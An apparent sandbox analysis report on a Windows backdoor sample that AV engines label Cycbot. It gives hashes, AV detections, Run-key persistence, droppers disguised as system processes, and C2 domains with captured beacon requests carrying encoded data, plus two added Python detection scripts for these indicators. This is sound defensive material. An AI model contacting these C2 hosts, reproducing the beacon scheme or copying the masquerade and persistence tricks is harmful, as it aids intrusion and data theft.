Analysis Date: 2014-12-20 01:41:47
MD5: 32b00c578558ce7fc2ada44b25573d39
SHA1: 2df29feedbd919845de272bd7621218b489c2bfd

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: e99281a08dc48647a1ad57d104284738  sha1: 2cb55824181f4e44f5c940c0c35ad1603756f5dd  size: 112128
Section .tls    md5: 10a8c61b3b395770bc0ff705962c3bf4  sha1: 07a4e17adee4d5f2d310b81abd8737ab7b90d843  size: 1024
Section .data   md5: d12ff4f2652e14be8a95aba85441c0aa  sha1: faecf12a9f1d37514a5f218a077051a746fd2fd7  size: 65536
Section .reloc  md5: d421512d595f1c37ffc787c216bf474d  sha1: 153cf0ef63e504590361fd2e445b81e618a20156  size: 1024
Timestamp: 2005-11-22 00:44:43
PEhash: 96e0568e6967c15897d5287b54d8ba9824722a23
IMPhash: ce10fee21e9a8b43ff33534a8c68b046
AV 360 Safe: Gen:Heur.Conjar.9
AV Ad-Aware: Gen:Heur.Conjar.9
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Heur.Conjar.9
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen8
AV BullGuard: Gen:Heur.Conjar.9
AV CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-7502
AV Dr. Web: BackDoor.Gbot.71 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.9
AV Eset (nod32): Win32/Kryptik.STB
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.o
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.9
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): BScope.DeadCryptor.01597

Runtime Details:

Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS mediacontent4you.com
Winsock DNS folusho.com
Winsock DNS 127.0.0.1
Winsock DNS onlinemediaresource.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
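
The runtime section above records the three host-side behaviours worth turning into a check: a Run value (conhost) pointing into the user profile, droppers named after Windows system processes (csrss.exe, dwm.exe, conhost.exe) written to Application Data and Temp, and ProxyEnable flipped to 1. The script below is an added example written for this page, not output of the sandbox or code from the sample. Its event tuples are constructed from the report's own lines plus one benign control; the set of system-process names and the Users\ profile prefix extend what the report shows to other names and to Vista-and-later profiles (an assumption of mine, not something this report demonstrates).

```python
"""Host-indicator triage for the behaviours recorded in the runtime section.

Added example; event data is constructed from the report's own lines.
"""
import re

# Windows system binaries whose names this sample borrows for its droppers.
# On a real host these live only under %SystemRoot%\\System32 (csrss.exe on XP;
# dwm.exe and conhost.exe exist only on Vista and later). The extra names are
# an assumed extension of the same idea, not something seen in this report.
MASQUERADED_NAMES = {
    "csrss.exe", "dwm.exe", "conhost.exe",
    "lsass.exe", "services.exe", "svchost.exe", "winlogon.exe", "smss.exe",
}

SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\(windows|winnt)\\system32\\", re.I)
# Non-greedy: pulls every drive-letter path ending in .exe out of a command
# line such as "C:\malware.exe startC:\...\Temp\csrss.exe%C:\...\Temp".
EXE_PATH_RE = re.compile(r"[a-z]:\\[^\r\n]*?\.exe\b", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
PROXY_ENABLE_RE = re.compile(r"\\Internet Settings\\ProxyEnable$", re.I)
# XP profile root from the report; "Users" is the assumed Vista+ equivalent.
USER_PROFILE_RE = re.compile(r"^[a-z]:\\(Documents and Settings|Users)\\", re.I)


def masqueraded_paths(text):
    """Return every .exe path in `text` that carries a system-process name
    but does not sit under %SystemRoot%\\System32."""
    hits = []
    for path in EXE_PATH_RE.findall(text):
        name = path.rsplit("\\", 1)[-1].lower()
        if name in MASQUERADED_NAMES and not SYSTEM_DIR_RE.match(path):
            hits.append(path)
    return hits


def triage(events):
    """events: iterable of (kind, key, value) tuples in the report's own
    vocabulary ('Registry', 'Creates File', 'Creates Process').
    Returns a list of (rule, detail) findings."""
    findings = []
    for kind, key, value in events:
        if kind == "Registry":
            if PROXY_ENABLE_RE.search(key) and value.strip() == "1":
                findings.append(("proxy_enabled", key))
            if RUN_KEY_RE.search(key) and USER_PROFILE_RE.match(value):
                findings.append(("run_key_user_path", f"{key} -> {value}"))
            subject = value
        else:
            subject = key
        for path in masqueraded_paths(subject):
            findings.append(("masquerade", path))
    return findings


# Constructed from the report's runtime lines; the last entry is a benign
# control that is not in the report.
EVENTS = [
    ("Registry",
     r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable",
     "1"),
    ("Registry",
     r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost",
     r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe"),
    ("Creates File",
     r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC", ""),
    ("Creates File",
     r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe", ""),
    ("Creates Process",
     r"C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"
     r"%C:\Documents and Settings\Administrator\Local Settings\Temp", ""),
    ("Creates Process",
     r"C:\Documents and Settings\Administrator\Application Data\dwm.exe", ""),
    ("Creates Process", r"C:\WINDOWS\system32\csrss.exe", ""),  # benign control
]

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule:18} {detail}")
```

Against the constructed events this yields one proxy_enabled finding, one run_key_user_path finding and four masquerade findings (conhost.exe twice, csrss.exe in Temp, dwm.exe in Application Data); the System32 csrss.exe control produces nothing. The same three rules apply unchanged to Sysmon registry, file and process events once they are mapped onto the (kind, key, value) shape.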

Network Details:

DNS folusho.com (Type: A) ➝ 67.222.55.143
DNS onlinemediaresource.com (Type: A) ➝ 54.208.78.194
DNS zonedg.com (Type: A) ➝ 141.8.225.80
DNS zonedg.com (Type: A) ➝ 141.8.225.80
DNS mediacontent4you.com (Type: A) ➝ 109.74.196.143
HTTP GET http://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v84=47&tq=gJ4WK%2FSUh7TFmkR8oY%2BQtMWTUj26kJH7yZpbK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP GET http://onlinemediaresource.com/blog/images/3521.jpg?v67=41&tq=gL5HtzyMv5rJsxG1J4Xo2rCyD%2FUvwr7UxUrEgPiWW1cg
User-Agent: mozilla/2.0
HTTP GET http://onlinemediaresource.com/blog/images/3521.jpg?v65=48&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNw1Kv975Xlm5G
User-Agent: mozilla/2.0
HTTP GET http://mediacontent4you.com/blog/images/3521.jpg?v19=54&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP 192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP 192.168.1.1:1032 ➝ 54.208.78.194:80
Flows TCP 192.168.1.1:1033 ➝ 54.208.78.194:80
Flows TCP 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1037 ➝ 109.74.196.143:80
Flows TCP 192.168.1.1:1038 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 38343d34   00x251.jpg?v84=4
0x00000040 (00064)   37267471 3d674a34 574b2532 46535568   7&tq=gJ4WK%2FSUh
0x00000050 (00080)   3754466d 6b52386f 59253242 51744d57   7TFmkR8oY%2BQtMW
0x00000060 (00096)   54556a32 366b4a48 37795a70 624b2532   TUj26kJH7yZpbK%2
0x00000070 (00112)   42253246 62785771 3153666b 49595542   B%2FbxWq1SfkIYUB
0x00000080 (00128)   4d204854 54502f31 2e300d0a 436f6e6e   M HTTP/1.0..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x000000a0 (00160)   6f73743a 20666f6c 7573686f 2e636f6d   ost: folusho.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 373d3431   /3521.jpg?v67=41
0x00000020 (00032)   2674713d 674c3548 747a794d 7635724a   &tq=gL5HtzyMv5rJ
0x00000030 (00048)   73784731 4a34586f 32724379 44253246   sxG1J4Xo2rCyD%2F
0x00000040 (00064)   55767772 37557855 72456750 69575731   Uvwr7UxUrEgPiWW1
0x00000050 (00080)   63672048 5454502f 312e300d 0a486f73   cg HTTP/1.0..Hos
0x00000060 (00096)   743a206f 6e6c696e 656d6564 69617265   t: onlinemediare
0x00000070 (00112)   736f7572 63652e63 6f6d0d0a 55736572   source.com..User
0x00000080 (00128)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000090 (00144)   322e300d 0a436f6e 6e656374 696f6e3a   2.0..Connection:
0x000000a0 (00160)   20636c6f 73650d0a 0d0a686f 2e636f6d    close....ho.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 353d3438   /3521.jpg?v65=48
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313757 3635724a   0ejbwvgS917W65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6f6e6c69 6e656d65 64696172 65736f75   onlinemediaresou
0x00000090 (00144)   7263652e 636f6d0d 0a416363 6570743a   rce.com..Accept:
0x000000a0 (00160)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000b0 (00176)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000000c0 (00192)   0a65722d 4167656e 743a206d 6f7a696c   .er-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7631 393d3534   /3521.jpg?v19=54
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313758 3635724a   0ejbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6d656469 61636f6e 74656e74 34796f75   mediacontent4you
0x00000090 (00144)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000000a0 (00160)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000000b0 (00176)   6f7a696c 6c612f32 2e300d0a 0d0a0a20   ozilla/2.0..... 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78723579 676d3143   JsX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

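
Every request in the captures above shares the same shape: the fixed lower-case User-Agent "mozilla/2.0", an opaque base64-style "tq=" blob in the query string, GETs for what look like static images but carry parameters, and POSTs with Content-Length: 0 whose payload rides entirely in the URL. The parser and scorer below are an added example written for this page, not code from the sandbox or from the sample; the two beacon requests are constructed from the first and fourth captures, the benign request is a constructed control, and the four traits plus the two-of-four threshold are my heuristic drawn from these captures rather than anything the report itself states.

```python
"""Score raw HTTP requests against the beacon profile seen in the Raw Pcap
section. Added example; request samples are constructed from the report."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed from the first capture (GET to folusho.com).
BEACON_GET = (
    b"GET /wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v84=47"
    b"&tq=gJ4WK%2FSUh7TFmkR8oY%2BQtMWTUj26kJH7yZpbK%2B%2FbxWq1SfkIYUBM HTTP/1.0\r\n"
    b"Connection: close\r\nHost: folusho.com\r\nAccept: */*\r\n"
    b"User-Agent: mozilla/2.0\r\n\r\n"
)
# Constructed from the fourth capture (POST to zonedg.com).
BEACON_POST = (
    b"POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0"
    b"%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPp"
    b"Tuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1\r\n"
    b"Host: zonedg.com\r\nUser-Agent: mozilla/2.0\r\nContent-Length: 0\r\n"
    b"Connection: close\r\n\r\n"
)
# Benign control, constructed; not from the report.
BENIGN_GET = (
    b"GET /blog/images/logo.gif HTTP/1.1\r\nHost: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0\r\n"
    b"Accept: image/*\r\n\r\n"
)

# Base64 alphabet, at least 16 chars, optional padding. Alphabet check only;
# the blob is never decoded, so a non-base64 scheme that reuses the alphabet
# still scores.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
IMAGE_RE = re.compile(r"\.(jpe?g|gif|png|bmp)$", re.I)


def parse_request(raw):
    """Split a raw HTTP/1.x request head into method, path, query, headers.
    Header names are lower-cased; the body, if any, is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "version": version,
        "path": parts.path,
        # parse_qsl percent-decodes, so %2B/%2F come back as + and /.
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "headers": headers,
    }


def beacon_indicators(req):
    """Return the list of profile traits a parsed request exhibits."""
    hits = []
    if req["headers"].get("user-agent", "").lower() == "mozilla/2.0":
        hits.append("fixed archaic User-Agent mozilla/2.0")
    if B64_RE.match(req["query"].get("tq", "")):
        hits.append("opaque base64-style 'tq' blob in the query string")
    if IMAGE_RE.search(req["path"]) and req["query"]:
        hits.append("static image path fetched with query parameters")
    if (req["method"] == "POST" and req["headers"].get("content-length") == "0"
            and req["query"]):
        hits.append("empty-body POST carrying its data in the URL")
    return hits


def is_beacon(raw, threshold=2):
    """True when at least `threshold` of the four traits are present.
    The threshold is an assumed tuning, not a value from the report."""
    return len(beacon_indicators(parse_request(raw))) >= threshold


if __name__ == "__main__":
    for label, raw in (("GET", BEACON_GET), ("POST", BEACON_POST), ("benign", BENIGN_GET)):
        print(label, is_beacon(raw), beacon_indicators(parse_request(raw)))
```

The two captured requests each trip three of the four traits (the GET: User-Agent, tq blob, image path with parameters; the POST: User-Agent, tq blob, empty-body POST) while the control trips none. The User-Agent string alone is a weak signal in isolation, which is why the scorer requires two traits before calling a request a beacon; on a proxy log the same function can be fed the reconstructed request line and headers directly.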

Strings
..
j
.
.~
...
...
.. .
.
4...
v
&*

080904b0
1.0.0.1
1815
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````````
  @`{" 
--------
,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,
//////////
[[[[[[[
@@&`@^
@&``^0
" `=0h
0HcJ:!
@0xM.4
@1?'4e
15_x:)
`1c`a#
1*`>_?g
@]1MtP
``1S9G
[2u0[U
2X.;nO
2,``-y
2z3rc';[@
  3"@ 
3RV042.
3Tv$>G
3 `@Zhz
491]8+
@4?FG,
4Pf~+F
/(  !5
>]5'~c
5fMeE"u
5KsJ-E
-5nErCgt
`#5O>/?}
5w`Wg$
6 @`A	
6jE-*`@?
6	q& `
_70_`V
7cjx/}D
$` 7^O
7O35ia
@ }{8`
" @9  
91'R8'WM-k
999999999999999999
)9E)63_
>9jRvo
9_oobo
9w-lJ!^
  a{4l
A	6KvA
AAAAAAAAA
@`Abo/
:a&:bR
ADVAPI32.dll
AE\v<q
AGx}[T
A/jz`A
A@m":$
az}]a/
@@|b2b
bbbbbbbbbb
`BBffI
 BfrK(
B_?h8Q"n
`"@`BUwZ
`bZtph
(  C  
Cbu}_E
cccccccc
 C( @E
CF%.gL
CGr`C~
cHa;" 
!ckl26
+CNEx0
cnMg"xX
Co9Mr]
%C--ty 
@c-`W+
c"@ Zv
`@D,``
]D2#;s
@.data
(/D]#D
DD&CZo
/D{=FEv
`@dg)>K
Dj~?7=w
DMyHpE&
D<:PG=
DRF@tH
dSI!-iH
DuplicateHandle
;-d?wo
]dzr)Q_@[
 >.@ )E
E{61W/
}e?ByW
EEEEEE
`eHhvS"
el}':8
EnumResourceNamesW
"`EP?h
eX)&` 
@@ex~Zq
f3{:J_
<f\Dyr
f(@@f,
FindClose
FindFirstFileA
FindResourceExA
FlushInstructionCache
F{T~}3
g#8GeNG
GetModuleFileNameW
  @@gl
?~GM.@
/gOyS]
`g>#R	
gUS%i\Jc>
GU{x5c4
gZrtQZ9:
  h1nbh
H5	hDA
 @@-%H8
`!HAwA
hb;^mp1
HF[	*R
hI8)Rx
Hj]d>th
Hk<9[bm
H~RBy+8
H][rUl?)
H})+^v
<HVyZv
h=\Z5VB-
I0cb"@
@ >i'4	z
ieu<C9
\}if!i
ig:UVm
Ij2O^x
IMmor1
IPq& @
Iw,&lIp3
``i<%z
&@`J/{
J3bm'E
J)<EB?+
jMTW;;
>jnBO,
j%-<t&@
`^J$W+
jwnzUT
`@;~KA
KERNEL32.dll
kF&` (
@@kKVF
+knlBUGv_a3A
Kt<OuX
_k@W @ 
 ``_kWKr
kwLThh
kwwhue
l0/HFv
L2,` :
lEb4v0
l_eM|:
L+Fnl>w
lkXx(Y
l"` [N
LOBioAZ5
l.@`Ww
L+XHWx
]L#zY?
m`8MX9
MapViewOfFile
MfM=4" 
MMMMMMMM
+M!S]A
